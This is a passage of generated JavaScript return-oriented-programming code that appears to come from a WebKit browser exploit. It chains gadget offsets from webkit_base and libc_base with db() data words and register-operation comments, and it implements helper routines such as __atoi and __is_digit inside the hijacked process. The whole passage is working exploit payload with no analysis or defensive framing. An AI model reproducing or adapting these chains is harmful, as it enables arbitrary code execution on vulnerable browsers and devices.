set_gadget(webkit_base+3236123,); //pop r9 //L2865: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2866: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2867: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+181808, //L2869 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2869: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+181936, //L2871 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+181952, //L2872 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+181920, 
//L2870 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2870: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2871: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2872: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+182032, //L2873 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+182048, //L2874 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2873: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2874: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+182160, //L2875 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+182192, //L2877 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+182176, //L2876 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2875: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2876: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2877: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+2115150, //setle al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+182368, //L2879 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+182384, //L2880 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+182352, //L2878 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 
//pop r9 ]); //L2878: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2879: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2880: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+182544, //L2885 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+182560, //L2886 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+182496, //L2882 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2882: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2883: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L2884: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2885: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2886: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+182672, //L2887+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+182664, //L2887 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L2887: db([0, 0]); // 0x0 set_gadgets([ ropchain+182688, //L2887+24 ropchain+184448, //L2881 libc_base+764760, //pop rsi ropchain+182728, //L2888 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2888: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2890: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+182848, //L2893 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+182832, //L2891 webkit_base+660161, //mov [rsi], rax 
; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2891: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2893: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+183008, //L2897 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+182976, //L2895 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+182992, //L2896 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2894: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2895: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2896: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2897: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+183064, //L2899 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2899: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+183192, //L2901 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+183208, //L2902 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+183176, //L2900 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2900: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2901: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2902: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+183368, //L2906 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+183336, //L2904 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+183352, //L2905 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2903: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2904: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2905: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2906: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+183424, //L2908 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2908: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+183552, //L2910 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+183568, //L2911 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+183536, //L2909 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2909: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2910: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2911: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+183648, //L2912 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+183664, //L2913 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2912: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2913: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+183760, //L2915 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+183744, //L2914 webkit_base+660161, //mov [rsi], rax 
; mov al, 1 libc_base+144605 //pop rdi ]); //L2914: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2915: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+183840, //L2916 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2916: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2917: db([57, 0]); // 0x39 set_gadget(libc_base+144605,); //pop rdi //L2918: db([57, 0]); // 0x39 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+183984, //L2919 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+184016, //L2921 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+184000, //L2920 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2919: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2920: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2921: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+2115150, //setle al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+184192, //L2923 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+184208, //L2924 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+184176, //L2922 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2922: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L2923: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2924: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+184352, //L2927 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+184368, //L2928 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+184320, //L2925 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2925: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2926: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L2927: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2928: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+184440, //L2929 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2929: db([0, 0]); // 0x0 //L2881: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+184504, //L2932 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L2931: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2932: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+184584, //L2934 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L2933: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2934: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+184712, //L2935 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+184744, //L2937 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+184728, //L2936 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2935: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2936: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2937: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+184848, //L2938 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+184864, //L2939 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2938: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2939: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+184984, //L2940 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+184968, //L2941 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2941: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2940: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+185072, //L2943 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+185056, //L2942 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2942: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2943: db([0, 0]); // 0x0 set_gadgets([ 
libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+185176, //L2944 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+185192, //L2945 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2944: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2945: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+185312, //L2946 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+185296, //L2947 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2947: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2946: db([0, 0]); // 0x0 //__atoi: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+185384, //L2949 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2949: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+185448, //L2951 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2951: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2952: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2954: db([4294967292, 4294967295]); // -0x4 
set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+185576, //L2956 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2955: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2956: db([0, 0]); // 0x0 set_gadgets([ webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+185632, //L2958 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2958: db([0, 0]); // 0x0 //L2957: set_gadgets([ libc_base+764760, //pop rsi ropchain+185680, //L2960 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2960: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2962: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+185800, //L2965 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+185784, //L2963 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2963: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2965: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+185880, //L2966 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+185896, //L2967 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2966: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2967: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+185976, //L2968 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+185992, //L2969 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); 
//L2968: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2969: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+186152, //L2973 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+186120, //L2971 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+186136, //L2972 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2970: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2971: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2972: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2973: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+186208, //L2975 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2975: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+186336, //L2977 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+186352, //L2978 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+186320, //L2976 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2976: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2977: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2978: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+186512, //L2982 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+186480, //L2980 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, 
//pop rsi ropchain+186496, //L2981 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2979: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2980: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2981: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2982: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+186568, //L2984 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2984: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+186696, //L2986 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+186712, //L2987 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+186680, //L2985 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2985: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2986: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2987: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+186872, //L2991 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+186840, //L2989 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+186856, //L2990 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2988: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2989: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2990: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2991: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi 
ropchain+186928, //L2993 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2993: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+187056, //L2995 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+187072, //L2996 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+187040, //L2994 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2994: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2995: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2996: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+187152, //L2997 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+187168, //L2998 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2997: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2998: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+187264, //L3000 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+187248, //L2999 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2999: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3000: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L3002: ropchain+187368, //L3001 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], 
rax libc_base+782311, //pop rsp ropchain+180736, //__is_digit //L3001: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+187496, //L3005 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+187480, //L3004 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3003: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3004: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3005: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+187552, //L3007 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3007: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+187680, //L3009 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+187696, //L3010 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+187664, //L3008 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3008: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3009: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3010: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+187808, //L3012 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+187856, //L3015 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+187824, //L3013 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 
